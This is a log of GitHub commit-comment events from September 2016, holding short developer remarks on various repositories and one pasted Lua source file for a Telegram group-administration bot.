{"id":"4611086497","type":"CommitCommentEvent","actor":{"login":"ackman678"},"repo":{"name":"denehyg/reveal.js-menu"},"payload":{"comment":{"id":19153490,"position":null,"line":null,"path":null,"commit_id":"a1000f912d649c28a279b48b68bab1217b7be894","created_at":"2016-09-23T21:45:03Z","updated_at":"2016-09-23T21:45:03Z","body":"@denehyg :  I was having the same issue with safari/webkit and I was getting string (\"true\") not recognized in Safari Dev Tools but I think there is simply just a missing closing parenthesis in the orig ln 490  above so my menu.js now works fine on Safari/webkit/iOS and the line reads:\r\n\r\n`if ( !document.querySelector('section[data-markdown]:not([data-markdown-parsed=\"true\"])') ) {`"}},"created_at":"2016-09-23T21:45:03Z"}
{"id":"4611089320","type":"CommitCommentEvent","actor":{"login":"alienCaramel"},"repo":{"name":"alienCaramel/bs-bree-shoes"},"payload":{"comment":{"id":19153501,"position":null,"line":null,"path":null,"commit_id":"32cccf23d186e2856a3341be3e46ce1f86e88bec","created_at":"2016-09-23T21:45:43Z","updated_at":"2016-09-23T21:45:43Z","body":"Initial base"}},"created_at":"2016-09-23T21:45:43Z"}
{"id":"4611101398","type":"CommitCommentEvent","actor":{"login":"finn-christiansen"},"repo":{"name":"finn-christiansen/solidstate"},"payload":{"comment":{"id":19153526,"position":null,"line":null,"path":null,"commit_id":"6e2a543071cf74c98931cf26d186944e0e6b8c53","created_at":"2016-09-23T21:48:29Z","updated_at":"2016-09-23T21:48:29Z","body":"Ich habe jetzt übrigens herausgefunden, dass der Importierer zusätzliche Befehle, wie z.B. für Überschriften oder Kommentare einfach ignoriert. D.h. wir können das Latex-Dokument wie gewohnt strukturieren um es übersichtlicher zu halten."}},"created_at":"2016-09-23T21:48:29Z"}
{"id":"4611101858","type":"CommitCommentEvent","actor":{"login":"GregOnNet"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19153529,"position":10,"line":10,"path":"src/app/book-monkey/iteration-5/directives/shared/zoom-book-cover.directive.ts","commit_id":"fb98b9d267815a73ff24e14c36f1f628add73fa0","created_at":"2016-09-23T21:48:35Z","updated_at":"2016-09-23T21:48:35Z","body":"Es registriert einen EventListener für ein bestimmtes Ereignis an einer @Component/@Directive."}},"created_at":"2016-09-23T21:48:35Z"}
{"id":"4611104945","type":"CommitCommentEvent","actor":{"login":"d-koppenhagen"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19153538,"position":10,"line":10,"path":"src/app/book-monkey/iteration-5/directives/shared/zoom-book-cover.directive.ts","commit_id":"fb98b9d267815a73ff24e14c36f1f628add73fa0","created_at":"2016-09-23T21:49:21Z","updated_at":"2016-09-23T21:49:21Z","body":"Bzw. siehe auch Styleguide: https://angular.io/docs/ts/latest/guide/style-guide.html#!#06-03"}},"created_at":"2016-09-23T21:49:21Z"}
{"id":"4611107966","type":"CommitCommentEvent","actor":{"login":"GregOnNet"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19153544,"position":2,"line":1,"path":"src/app/book-monkey/iteration-5/directives/book-list-item/book-list-item.component.html","commit_id":"fb98b9d267815a73ff24e14c36f1f628add73fa0","created_at":"2016-09-23T21:50:08Z","updated_at":"2016-09-23T21:50:08Z","body":"Das beantwortet nicht so ganz meine Frage.\r\nIch wollte damit andeuten, dass ein Template-Error geworfen wird fals `book?.thumbnails[0]` keinen Wert enthält.\r\nDas fangen wir im Template aus meiner Sicht noch nicht ab. "}},"created_at":"2016-09-23T21:50:08Z"}
{"id":"4611110906","type":"CommitCommentEvent","actor":{"login":"rkirov"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19153548,"position":10,"line":84,"path":"modules/@angular/compiler/src/output/ts_emitter.ts","commit_id":"d4e9af3ccb0f6ec4d610518f9c0435bcb9f9042f","created_at":"2016-09-23T21:50:46Z","updated_at":"2016-09-23T21:50:46Z","body":"https://github.com/angular/angular/pull/11870"}},"created_at":"2016-09-23T21:50:46Z"}
{"id":"4611114760","type":"CommitCommentEvent","actor":{"login":"chhopsky"},"repo":{"name":"Pjeter/esporks"},"payload":{"comment":{"id":19153558,"position":null,"line":null,"path":null,"commit_id":"bd04a59a67c3fe3bad1ed152f293c2a72e078e88","created_at":"2016-09-23T21:51:45Z","updated_at":"2016-09-23T21:51:45Z","body":"ROFL\r\n\r\nholy shit the code updated itself because i edited it in browser while it was running.  "}},"created_at":"2016-09-23T21:51:45Z"}
{"id":"4611118246","type":"CommitCommentEvent","actor":{"login":"xlab"},"repo":{"name":"slimsag/music"},"payload":{"comment":{"id":19153566,"position":15,"line":23,"path":"README.md","commit_id":"ed52e97c3eb7bfda1b66e8d62b6bd2bdb7446555","created_at":"2016-09-23T21:52:38Z","updated_at":"2016-09-23T21:52:38Z","body":"Looks like chienese zither."}},"created_at":"2016-09-23T21:52:38Z"}
{"id":"4611120633","type":"CommitCommentEvent","actor":{"login":"chhopsky"},"repo":{"name":"Pjeter/esporks"},"payload":{"comment":{"id":19153575,"position":null,"line":null,"path":null,"commit_id":"bd04a59a67c3fe3bad1ed152f293c2a72e078e88","created_at":"2016-09-23T21:53:14Z","updated_at":"2016-09-23T21:53:14Z","body":"Probably should have done a PR so i could merge this back into master?"}},"created_at":"2016-09-23T21:53:14Z"}
{"id":"4611123535","type":"CommitCommentEvent","actor":{"login":"ChronoTensai"},"repo":{"name":"ChronoTensai/sdl2tetris"},"payload":{"comment":{"id":19153578,"position":8,"line":8,"path":"Project1/Project1/EngineTools.h","commit_id":"db5997364726398c06598797389c659d92b2fbfd","created_at":"2016-09-23T21:53:59Z","updated_at":"2016-09-23T21:53:59Z","body":"Cuando arranque esto pense que iba a manejar varios de estas herramientas en una sola clase y queria tenerlas en una sola clase.\r\nDespues se fue especializando tanto que no fue necesario."}},"created_at":"2016-09-23T21:53:59Z"}
{"id":"4611134820","type":"CommitCommentEvent","actor":{"login":"nekufa"},"repo":{"name":"tarantool/doc"},"payload":{"comment":{"id":19153614,"position":21,"line":62,"path":"sphinx/book/connectors/__php.rst","commit_id":"def33e71cc369b05d806b15f6af86291b72c7332","created_at":"2016-09-23T21:56:48Z","updated_at":"2016-09-23T21:56:48Z","body":"@lenkis thanks for the suggestions. i'm agree with rybakit, data mapper is correct name, because it is two-way mapper tarantool tuples with php objects.\r\nBy the way, the client is not simple alternative - it is implemented in pure php and can be used without extension compilation. It's really quick start way to use tarantool from php."}},"created_at":"2016-09-23T21:56:48Z"}
{"id":"4611137150","type":"CommitCommentEvent","actor":{"login":"PandelisZ"},"repo":{"name":"HaCSBCU/email"},"payload":{"comment":{"id":19153623,"position":null,"line":null,"path":null,"commit_id":"638fdc89ea9da6349aec8fbe51e153e732e297a0","created_at":"2016-09-23T21:57:24Z","updated_at":"2016-09-23T21:57:24Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Email Campaign](https://trello.com/c/WeflyfMj/1-email-campaign)"}},"created_at":"2016-09-23T21:57:24Z"}
{"id":"4611138702","type":"CommitCommentEvent","actor":{"login":"sammefford"},"repo":{"name":"marklogic/java-client-api"},"payload":{"comment":{"id":19153627,"position":3,"line":341,"path":"test-complete/src/test/java/com/marklogic/client/functionaltest/TestPOJOWithDocsStoredByOthers.java","commit_id":"6a76a365874bec88e4eaac04ac8e149c4c85700c","created_at":"2016-09-23T21:57:48Z","updated_at":"2016-09-23T21:57:48Z","body":"Did you want to update this date?"}},"created_at":"2016-09-23T21:57:48Z"}
{"id":"4611139281","type":"CommitCommentEvent","actor":{"login":"philfreo"},"repo":{"name":"closeio/redis-hashring"},"payload":{"comment":{"id":19153629,"position":3,"line":3,"path":"circle.yml","commit_id":"479982747bc613781afff388daaf8d85f56ec72d","created_at":"2016-09-23T21:57:57Z","updated_at":"2016-09-23T21:57:57Z","body":"s/2.7.11/2.7.12 pls"}},"created_at":"2016-09-23T21:57:57Z"}
{"id":"4611142153","type":"CommitCommentEvent","actor":{"login":"laco0416"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19153636,"position":null,"line":null,"path":null,"commit_id":"0dc15eb64ac268e115c484319941ba11ce09d596","created_at":"2016-09-23T21:58:39Z","updated_at":"2016-09-23T21:58:39Z","body":"@vicb This commit should be related to https://github.com/angular/angular/issues/11645 \r\n\r\nOpened. https://github.com/angular/angular/pull/11871\r\n"}},"created_at":"2016-09-23T21:58:39Z"}
{"id":"4611144382","type":"CommitCommentEvent","actor":{"login":"hamidreza0077"},"repo":{"name":"hamidreza0077/123"},"payload":{"comment":{"id":19153641,"position":null,"line":null,"path":null,"commit_id":"95853bd2375589dbb70f56e46c9bd35a1a351e33","created_at":"2016-09-23T21:59:12Z","updated_at":"2016-09-23T21:59:12Z","body":"package.path = package.path .. ';.luarocks/share/lua/5.2/?.lua'\r\n..';.luarocks/share/lua/5.2/?/init.lua'\r\npackage.cpath = package.cpath .. ';.luarocks/lib/lua/5.2/?.so'\r\nrequire(\"./bot/utils\")\r\nVERSION = '1.0'\r\n-- This function is called when tg receive a msg\r\nfunction on_msg_receive (msg)\r\nif not started then\r\nreturn\r\nend\r\nlocal receiver = get_receiver(msg)\r\nprint (receiver)\r\n--vardump(msg)\r\nmsg = pre_process_service_msg(msg)\r\nif msg_valid(msg) then\r\nmsg = pre_process_msg(msg)\r\nif msg then\r\nmatch_plugins(msg)\r\n-- mark_read(receiver, ok_cb, false)\r\nend\r\nend\r\nend\r\nfunction ok_cb(extra, success, result)\r\nend\r\nfunction on_binlog_replay_end()\r\nstarted = true\r\npostpone (cron_plugins, false, 60*5.0)\r\n_config = load_config()\r\n-- load plugins\r\nplugins = {}\r\nload_plugins()\r\nend\r\nfunction msg_valid(msg)\r\n-- Don't process outgoing messages\r\nif msg.out then\r\nprint('\\27[36mNot valid: msg from us\\27[39m')\r\nreturn false\r\nend\r\n-- Before bot was started\r\nif msg.date < now then\r\nprint('\\27[36mNot valid: old msg\\27[39m')\r\nreturn false\r\nend\r\nif msg.unread == 0 then\r\nprint('\\27[36mNot valid: readed\\27[39m')\r\nreturn false\r\nend\r\nif not msg.to.id then\r\nprint('\\27[36mNot valid: To id not provided\\27[39m')\r\nreturn false\r\nend\r\nif not msg.from.id then\r\nprint('\\27[36mNot valid: From id not provided\\27[39m')\r\nreturn false\r\nend\r\nif msg.from.id == our_id then\r\nprint('\\27[36mNot valid: Msg from our id\\27[39m')\r\nreturn false\r\nend\r\nif msg.to.type == 'encr_chat' then\r\nprint('\\27[36mNot valid: Encrypted chat\\27[39m')\r\nreturn false\r\nend\r\nif msg.from.id == 777000 then\r\nlocal login_group_id = 1\r\n--It will send login codes to this chat\r\nsend_large_msg('chat#id'..login_group_id, msg.text)\r\nend\r\nreturn true\r\nend\r\n-- \r\nfunction pre_process_service_msg(msg)\r\nif msg.service then\r\nlocal action = msg.action or {type=\"\"}\r\n-- Double ! to discriminate of normal actions\r\nmsg.text = \"!!tgservice \" .. action.type\r\n-- wipe the data to allow the bot to read service messages\r\nif msg.out then\r\nmsg.out = false\r\nend\r\nif msg.from.id == our_id then\r\nmsg.from.id = 0\r\nend\r\nend\r\nreturn msg\r\nend\r\n-- Apply plugin.pre_process function\r\nfunction pre_process_msg(msg)\r\nfor name,plugin in pairs(plugins) do\r\nif plugin.pre_process and msg then\r\nprint('Preprocess', name)\r\nmsg = plugin.pre_process(msg)\r\nend\r\nend\r\nreturn msg\r\nend\r\n-- Go over enabled plugins patterns.\r\nfunction match_plugins(msg)\r\nfor name, plugin in pairs(plugins) do\r\nmatch_plugin(plugin, name, msg)\r\nend\r\nend\r\n-- Check if plugin is on _config.disabled_plugin_on_chat table\r\nlocal function is_plugin_disabled_on_chat(plugin_name, receiver)\r\nlocal disabled_chats = _config.disabled_plugin_on_chat\r\n-- Table exists and chat has disabled plugins\r\nif disabled_chats and disabled_chats[receiver] then\r\n-- Checks if plugin is disabled on this chat\r\nfor disabled_plugin,disabled in pairs(disabled_chats[receiver]) do\r\nif disabled_plugin == plugin_name and disabled then\r\nlocal warning = 'Plugin '..disabled_plugin..' is disabled on this chat'\r\nprint(warning)\r\nsend_msg(receiver, warning, ok_cb, false)\r\nreturn true\r\nend\r\nend\r\nend\r\nreturn false\r\nend\r\nfunction match_plugin(plugin, plugin_name, msg)\r\nlocal receiver = get_receiver(msg)\r\n-- Go over patterns. If one matches it's enough.\r\nfor k, pattern in pairs(plugin.patterns) do\r\nlocal matches = match_pattern(pattern, msg.text)\r\nif matches then\r\nprint(\"msg matches: \", pattern)\r\nif is_plugin_disabled_on_chat(plugin_name, receiver) then\r\nreturn nil\r\nend\r\n-- Function exists\r\nif plugin.run then\r\n-- If plugin is for privileged users only\r\nif not warns_user_not_allowed(plugin, msg) then\r\nlocal result = plugin.run(msg, matches)\r\nif result then\r\nsend_large_msg(receiver, result)\r\nend\r\nend\r\nend\r\n-- One patterns matches\r\nreturn\r\nend\r\nend\r\nend\r\n-- DEPRECATED, use send_large_msg(destination, text)\r\nfunction _send_msg(destination, text)\r\nsend_large_msg(destination, text)\r\nend\r\n-- Save the content of _config to config.lua\r\nfunction save_config( )\r\nserialize_to_file(_config, './data/config.lua')\r\nprint ('saved config into ./data/config.lua')\r\nend\r\n-- Returns the config from config.lua file.\r\n-- If file doesn't exist, create it.\r\nfunction load_config( )\r\nlocal f = io.open('./data/config.lua', \"r\")\r\n-- If config.lua doesn't exist\r\nif not f then\r\nprint (\"Created new config file: data/config.lua\")\r\ncreate_config()\r\nelse\r\nf:close()\r\nend\r\nlocal config = loadfile (\"./data/config.lua\")()\r\nfor v,user in pairs(config.sudo_users) do\r\nprint(\"Allowed user: \" .. user)\r\nend\r\nreturn config\r\nend\r\n-- Create a basic config.json file and saves it.\r\nfunction create_config( )\r\n-- A simple config with basic plugins and ourselves as privileged user\r\nconfig = {\r\nenabled_plugins = {\r\n\"onservice\",\r\n\"inrealm\",\r\n\"ingroup\",\r\n\"inpm\",\r\n\"banhammer\",\r\n\"stats\",\r\n\"anti_spam\",\r\n\"owners\",\r\n\"arabic_lock\",\r\n\"set\",\r\n\"get\",\r\n\"broadcast\",\r\n\"download_media\",\r\n\"invite\",\r\n\"all\",\r\n\"leave_ban\"\r\n},\r\nsudo_users = {237639191},--Sudo users\r\ndisabled_channels = {},\r\nmoderation = {data = 'data/moderation.json'},\r\nabout_text = [[Teleseed v2 - Open Source\r\nAn advance Administration bot based on yagop/telegram-bot\r\nاینجا کلا پاک شده!\r\nاگه با سودو کار داری\r\n@yellowhat\r\n]],\r\nhelp_text_realm = [[\r\nRealm Commands:\r\n!creategroup [Name]\r\nCreate a group\r\n!createrealm [Name]\r\nCreate a realm\r\n!setname [Name]\r\nSet realm name\r\n!setabout [GroupID] [Text]\r\nSet a group's about text\r\n!setrules [GroupID] [Text]\r\nSet a group's rules\r\n!lock [GroupID] [setting]\r\nLock a group's setting\r\n!unlock [GroupID] [setting]\r\nUnock a group's setting\r\n!wholist\r\nGet a list of members in group/realm\r\n!who\r\nGet a file of members in group/realm\r\n!type\r\nGet group type\r\n!kill chat [GroupID]\r\nKick all memebers and delete group\r\n!kill realm [RealmID]\r\nKick all members and delete realm\r\n!addadmin [id|username]\r\nPromote an admin by id OR username *Sudo only\r\n!removeadmin [id|username]\r\nDemote an admin by id OR username *Sudo only\r\n!list groups\r\nGet a list of all groups\r\n!list realms\r\nGet a list of all realms\r\n!log\r\nGrt a logfile of current group or realm\r\n!broadcast [text]\r\n!broadcast Hello !\r\nSend text to all groups\r\nOnly sudo users can run this command\r\n!br [group_id] [text]\r\n!br 123456789 Hello !\r\nThis command will send text to [group_id]\r\n**U can use both \"/\" and \"!\"\r\n*Only admins and sudo can add bots in group\r\n*Only admins and sudo can use kick,ban,unban,newlink,setphoto,setname,lock,unlock,set rules,set about and settings commands\r\n*Only admins and sudo can use res, setowner, commands\r\n]],\r\nhelp_text = [[\r\nCommands list :\r\n!kick [username|id]\r\nYou can also do it by reply\r\n!ban [ username|id]\r\nYou can also do it by reply\r\n!unban [id]\r\nYou can also do it by reply\r\n!who\r\nMembers list\r\n!modlist\r\nModerators list\r\n!promote [username]\r\nPromote someone\r\n!demote [username]\r\nDemote someone\r\n!kickme\r\nWill kick user\r\n!about\r\nGroup description\r\n!setphoto\r\nSet and locks group photo\r\n!setname [name]\r\nSet group name\r\n!rules\r\nGroup rules\r\n!id\r\nreturn group id or user id\r\n!help\r\n!lock [member|name|bots|leave]\r\nLocks [member|name|bots|leaveing]\r\n!unlock [member|name|bots|leave]\r\nUnlocks [member|name|bots|leaving]\r\n!set rules <text>\r\nSet <text> as rules\r\n!set about <text>\r\nSet <text> as about\r\n!settings\r\nReturns group settings\r\n!newlink\r\ncreate/revoke your group link\r\n!link\r\nreturns group link\r\n!owner\r\nreturns group owner id\r\n!setowner [id]\r\nWill set id as owner\r\n!setflood [value]\r\nSet [value] as flood sensitivity\r\n!stats\r\nSimple message statistics\r\n!save [value] <text>\r\nSave <text> as [value]\r\n!get [value]\r\nReturns text of [value]\r\n!clean [modlist|rules|about]\r\nWill clear [modlist|rules|about] and set it to nil\r\n!res [username]\r\nreturns user id\r\n\"!res @username\"\r\n!log\r\nwill return group logs\r\n!banlist\r\nwill return group ban list\r\n**U can use both \"/\" and \"!\"\r\n*Only owner and mods can add bots in group\r\n*Only moderators and owner can use kick,ban,unban,newlink,link,setphoto,setname,lock,unlock,set rules,set about and settings commands\r\n*Only owner can use res,setowner,promote,demote and log commands\r\n]]\r\n}\r\nserialize_to_file(config, './data/config.lua')\r\nprint('saved config into ./data/config.lua')\r\nend\r\nfunction on_our_id (id)\r\nour_id = id\r\nend\r\nfunction on_user_update (user, what)\r\n--vardump (user)\r\nend\r\nfunction on_chat_update (chat, what)\r\nend\r\nfunction on_secret_chat_update (schat, what)\r\n--vardump (schat)\r\nend\r\nfunction on_get_difference_end ()\r\nend\r\n-- Enable plugins in config.json\r\nfunction load_plugins()\r\nfor k, v in pairs(_config.enabled_plugins) do\r\nprint(\"Loading plugin\", v)\r\nlocal ok, err = pcall(function()\r\nlocal t = loadfile(\"plugins/\"..v..'.lua')()\r\nplugins[v] = t\r\nend)\r\nif not ok then\r\nprint('\\27[31mError loading plugin '..v..'\\27[39m')\r\nprint('\\27[31m'..err..'\\27[39m')\r\nend\r\nend\r\nend\r\n-- custom add\r\nfunction load_data(filename)\r\nlocal f = io.open(filename)\r\nif not f then\r\nreturn {}\r\nend\r\nlocal s = f:read('*all')\r\nf:close()\r\nlocal data = JSON.decode(s)\r\nreturn data\r\nend\r\nfunction save_data(filename, data)\r\nlocal s = JSON.encode(data)\r\nlocal f = io.open(filename, 'w')\r\nf:write(s)\r\nf:close()\r\nend\r\n-- Call and postpone execution for cron plugins\r\nfunction cron_plugins()\r\nfor name, plugin in pairs(plugins) do\r\n-- Only plugins with cron function\r\nif plugin.cron ~= nil then\r\nplugin.cron()\r\nend\r\nend\r\n-- Called again in 2 mins\r\npostpone (cron_plugins, false, 120)\r\nend\r\n-- Start and load values\r\nour_id = 0\r\nnow = os.time()\r\nmath.randomseed(now)\r\nstarted = false"}},"created_at":"2016-09-23T21:59:12Z"}
{"id":"4611149287","type":"CommitCommentEvent","actor":{"login":"juliocesar-io"},"repo":{"name":"secbi-ucc/control-bienestar"},"payload":{"comment":{"id":19153657,"position":8,"line":15,"path":"profesor/models.py","commit_id":"6ace2f7f2f772fba7f388f030ceee249c8a3b9a5","created_at":"2016-09-23T22:00:22Z","updated_at":"2016-09-23T22:00:22Z","body":"Utilizar el modelos de Usuario de Django en ref.\r\n\r\nref: https://docs.djangoproject.com/en/1.10/topics/auth/default/#user-objects"}},"created_at":"2016-09-23T22:00:22Z"}
{"id":"4611152324","type":"CommitCommentEvent","actor":{"login":"Guichaguri"},"repo":{"name":"blend88/RemoteControls"},"payload":{"comment":{"id":19153665,"position":null,"line":null,"path":null,"commit_id":"e475d4d3a0a87f3b1937033a4e8864c2cba7c238","created_at":"2016-09-23T22:01:04Z","updated_at":"2016-09-23T22:01:04Z","body":"Nice to see someone working on the iOS source.\r\nIf you need any help to understand how the API something like that"}},"created_at":"2016-09-23T22:01:04Z"}
{"id":"4611152580","type":"CommitCommentEvent","actor":{"login":"kevinabrandon"},"repo":{"name":"lazywei/go-opencv"},"payload":{"comment":{"id":19153666,"position":null,"line":null,"path":null,"commit_id":"7bd08d89d2c45e2e3eaaf83b9269887fded50fa0","created_at":"2016-09-23T22:01:06Z","updated_at":"2016-09-23T22:01:06Z","body":"Fixes Issue #81 "}},"created_at":"2016-09-23T22:01:06Z"}
{"id":"4611155217","type":"CommitCommentEvent","actor":{"login":"paulbiss"},"repo":{"name":"facebook/folly"},"payload":{"comment":{"id":19153674,"position":null,"line":null,"path":null,"commit_id":"70618258130b18cae08ecd5e88de518ab38425fd","created_at":"2016-09-23T22:01:44Z","updated_at":"2016-09-23T22:01:44Z","body":"I see no references to this method in master for wangle, can you point me to where you think we're referencing it?"}},"created_at":"2016-09-23T22:01:44Z"}
{"id":"4611161453","type":"CommitCommentEvent","actor":{"login":"vicb"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19153679,"position":null,"line":null,"path":null,"commit_id":"0dc15eb64ac268e115c484319941ba11ce09d596","created_at":"2016-09-23T22:03:14Z","updated_at":"2016-09-23T22:03:14Z","body":"thanks"}},"created_at":"2016-09-23T22:03:14Z"}
{"id":"4611164564","type":"CommitCommentEvent","actor":{"login":"ralt"},"repo":{"name":"platformsh/platformsh-docs"},"payload":{"comment":{"id":19153689,"position":15,"line":205,"path":"src/configuration/app-containers.md","commit_id":"09ded2558f8f4a114c00a86a63c4a049abee9674","created_at":"2016-09-23T22:04:03Z","updated_at":"2016-09-23T22:04:03Z","body":"Only `http` is supported, no?"}},"created_at":"2016-09-23T22:04:03Z"}
{"id":"4611166292","type":"CommitCommentEvent","actor":{"login":"Guichaguri"},"repo":{"name":"blend88/RemoteControls"},"payload":{"comment":{"id":19153696,"position":null,"line":null,"path":null,"commit_id":"e475d4d3a0a87f3b1937033a4e8864c2cba7c238","created_at":"2016-09-23T22:04:29Z","updated_at":"2016-09-23T22:04:29Z","body":"Nice to see someone working on the iOS code.\r\nIf you need any help to understand how the new API works to behave properly on both platforms, just ask it :)"}},"created_at":"2016-09-23T22:04:29Z"}
{"id":"4611172550","type":"CommitCommentEvent","actor":{"login":"Ethervil"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":19153708,"position":null,"line":null,"path":null,"commit_id":"050fd07fa93e980098072f1fb95f73edffb8226d","created_at":"2016-09-23T22:06:01Z","updated_at":"2016-09-23T22:06:01Z","body":"Great work @rafaelcp! I've tested it out, and it works wonderfully!\r\n\r\nI'll hopefully be applying my own update with 1 or 2 new enemies plus a minor change to the prtEquip soon."}},"created_at":"2016-09-23T22:06:01Z"}
{"id":"4611172927","type":"CommitCommentEvent","actor":{"login":"Jeremy0dell"},"repo":{"name":"Jeremy0dell/Quotes"},"payload":{"comment":{"id":19153709,"position":null,"line":null,"path":null,"commit_id":"f4d7a95f55d5972347664e4f18eba9a22ee4eb39","created_at":"2016-09-23T22:06:07Z","updated_at":"2016-09-23T22:06:07Z","body":"Comment on GitHub about the change"}},"created_at":"2016-09-23T22:06:07Z"}
{"id":"4611179276","type":"CommitCommentEvent","actor":{"login":"aejolene"},"repo":{"name":"aejolene/compass"},"payload":{"comment":{"id":19153725,"position":null,"line":null,"path":null,"commit_id":"98f65b794dbc32a25983ba78eac3ccec2ec2df15","created_at":"2016-09-23T22:07:44Z","updated_at":"2016-09-23T22:07:44Z","body":"View and edit using [http://ai2.appinventor.mit.edu/](http://ai2.appinventor.mit.edu/)"}},"created_at":"2016-09-23T22:07:44Z"}
{"id":"4611188296","type":"CommitCommentEvent","actor":{"login":"thomasst"},"repo":{"name":"closeio/redis-hashring"},"payload":{"comment":{"id":19153749,"position":3,"line":3,"path":"circle.yml","commit_id":"479982747bc613781afff388daaf8d85f56ec72d","created_at":"2016-09-23T22:10:01Z","updated_at":"2016-09-23T22:10:01Z","body":"Circle doesn't haveit: `pyenv: version `2.7.12' not installed`"}},"created_at":"2016-09-23T22:10:01Z"}
{"id":"4611192394","type":"CommitCommentEvent","actor":{"login":"Keno"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19153757,"position":null,"line":null,"path":null,"commit_id":"331bf2e662a4be00d1b143fc1b186345728b280b","created_at":"2016-09-23T22:11:03Z","updated_at":"2016-09-23T22:11:03Z","body":"I'm seeing cases were `0xCF` pops up in what is supposed to be the xsave hardware reserved area (416-463)"}},"created_at":"2016-09-23T22:11:03Z"}
{"id":"4611197913","type":"CommitCommentEvent","actor":{"login":"mssmalle"},"repo":{"name":"zachlittle/sourceclub"},"payload":{"comment":{"id":19153773,"position":null,"line":null,"path":null,"commit_id":"6fc44e9e90ba245d84e0b6eeddb0ec2e03aac6a0","created_at":"2016-09-23T22:12:30Z","updated_at":"2016-09-23T22:12:30Z","body":"Also jk i fixed it in class haha @zachlittle "}},"created_at":"2016-09-23T22:12:30Z"}
{"id":"4611198118","type":"CommitCommentEvent","actor":{"login":"matsbla"},"repo":{"name":"Code4SA/code4sa.github.io"},"payload":{"comment":{"id":19153774,"position":35,"line":35,"path":"_posts/2016-09-26-media-professionals-about-data-driven-journalism.md","commit_id":"53911abe665502b80092ad52a752c88bf12c0462","created_at":"2016-09-23T22:12:34Z","updated_at":"2016-09-23T22:12:34Z","body":"Typo fixed!"}},"created_at":"2016-09-23T22:12:34Z"}
{"id":"4611199273","type":"CommitCommentEvent","actor":{"login":"1KX2"},"repo":{"name":"yairpatch/android_device_lge_g3-common"},"payload":{"comment":{"id":19153776,"position":null,"line":null,"path":null,"commit_id":"158caa12bc4d59e7e4f5b39ad3ae0ae6d243d95b","created_at":"2016-09-23T22:12:51Z","updated_at":"2016-09-23T22:12:51Z","body":"@quesoo No, very bad job. This is missing all commit history.\r\n\r\n"}},"created_at":"2016-09-23T22:12:51Z"}
{"id":"4611201288","type":"CommitCommentEvent","actor":{"login":"DemonWav"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19153780,"position":null,"line":null,"path":null,"commit_id":"d3eb13d60dad0ea895ea8eef73216dae955a3fba","created_at":"2016-09-23T22:13:22Z","updated_at":"2016-09-23T22:13:22Z","body":"Yeah, this should place the player just outside of the world I think (257 maybe)."}},"created_at":"2016-09-23T22:13:22Z"}
{"id":"4611201448","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19153781,"position":null,"line":null,"path":null,"commit_id":"222ee920199edfc1ffad9e39e09bdcacb90fac78","created_at":"2016-09-23T22:13:24Z","updated_at":"2016-09-23T22:13:24Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2339 of 2339 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T22:13:24Z"}
{"id":"4611202801","type":"CommitCommentEvent","actor":{"login":"TheFakeMateo"},"repo":{"name":"TheFakeMateo/RedPlusPlus"},"payload":{"comment":{"id":19153787,"position":null,"line":null,"path":null,"commit_id":"07764c6811909b5b6a60c190d0f367ce4ac8ef52","created_at":"2016-09-23T22:13:46Z","updated_at":"2016-09-23T22:13:46Z","body":"This commit was reverted once the actual issue was fixed. The ReadMove helper function was looking for move data in the wrong bank,  causing checks to be performed on junk data."}},"created_at":"2016-09-23T22:13:46Z"}
{"id":"4611208549","type":"CommitCommentEvent","actor":{"login":"felipesanches"},"repo":{"name":"garoa/Display_Epoch"},"payload":{"comment":{"id":19153799,"position":null,"line":null,"path":null,"commit_id":"a15fe989b85b31efa9bb3c8163c709ec77a386aa","created_at":"2016-09-23T22:15:14Z","updated_at":"2016-09-23T22:15:14Z","body":":8ball: "}},"created_at":"2016-09-23T22:15:14Z"}
{"id":"4611211201","type":"CommitCommentEvent","actor":{"login":"rafaelcp"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":19153809,"position":null,"line":null,"path":null,"commit_id":"050fd07fa93e980098072f1fb95f73edffb8226d","created_at":"2016-09-23T22:15:53Z","updated_at":"2016-09-23T22:15:53Z","body":"Nice :) Make sure to always check enemy data here http://megaman.wikia.com/ and watch their behaviors on Youtube or playing the games :)"}},"created_at":"2016-09-23T22:15:53Z"}
{"id":"4611212449","type":"CommitCommentEvent","actor":{"login":"fson"},"repo":{"name":"facebookincubator/create-react-app"},"payload":{"comment":{"id":19153817,"position":33,"line":78,"path":"packages/react-scripts/package.json","commit_id":"7ac8777ed1cebec6084a03e84272cfd21128b356","created_at":"2016-09-23T22:16:14Z","updated_at":"2016-09-23T22:16:14Z","body":"Are we keeping the `bundledDependencies` array in package.json now or was this commited by accident? "}},"created_at":"2016-09-23T22:16:14Z"}
{"id":"4611212923","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"dhustkoder/OTServ772"},"payload":{"comment":{"id":19153818,"position":null,"line":null,"path":null,"commit_id":"335aab875e7c6c4e01cf6f98e5522d86f4b06bb7","created_at":"2016-09-23T22:16:22Z","updated_at":"2016-09-23T22:16:22Z","body":"Dude"}},"created_at":"2016-09-23T22:16:22Z"}
